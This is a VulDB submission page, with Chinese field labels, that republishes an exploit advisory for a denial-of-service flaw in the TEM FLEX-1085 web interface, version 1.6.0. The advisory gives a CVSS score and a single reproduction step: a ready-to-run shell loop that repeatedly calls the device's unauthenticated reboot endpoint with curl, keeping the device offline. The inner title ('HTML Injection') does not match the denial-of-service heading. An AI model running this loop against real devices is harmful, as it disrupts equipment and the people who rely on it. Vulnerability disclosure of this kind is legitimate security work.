| 标题 | FLEX-1085 Web Denial of Service |
|---|
| 描述 | # Exploit Title: FLEX-1085 Web Denial of Service
# Date: 30/07/2022
# Exploit Author: Mr Empy
# Vendor Homepage: https://www.tem.ind.br/
# Software Link: https://www.tem.ind.br/?page=prod-detalhe&id=94
# Version: 1.6.0
# Tested on: Linux
Title:
================
FLEX 1085 Web - HTML Injection
Summary:
================
A vulnerability, which was classified as problematic, was found in TEM FLEX-1085 1.6.0. Affected is an unknown function. The issue was identified as Denial of Service, allowing an unauthenticated malicious user to leave the device idle.
Severity Level:
================
7.5 (High)
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Affected Product:
================
FLEX 1085 Web v1.6.0
Steps to Reproduce:
================
1. Run this command in your terminal:
TARGET=http://target.com;while true;do curl -s $TARGET/sistema/flash/reboot > /dev/null;sleep 1;done |
|---|
| 来源 | ⚠️ https://www.tem.ind.br/?page=prod-detalhe&id=94&sid=0 |
|---|
| 用户 | mrempy (UID 24379) |
|---|
| 提交 | 2022-07-31 02時23分 (4 年前) |
|---|
| 管理 | 2022-07-31 09時16分 (7 hours later) |
|---|
| 状态 | 已接受 |
|---|
| VulDB条目 | 205344 [TEM FLEX-1085 1.6.0 /sistema/flash/reboot 拒绝服务] |
|---|
| 积分 | 17 |
|---|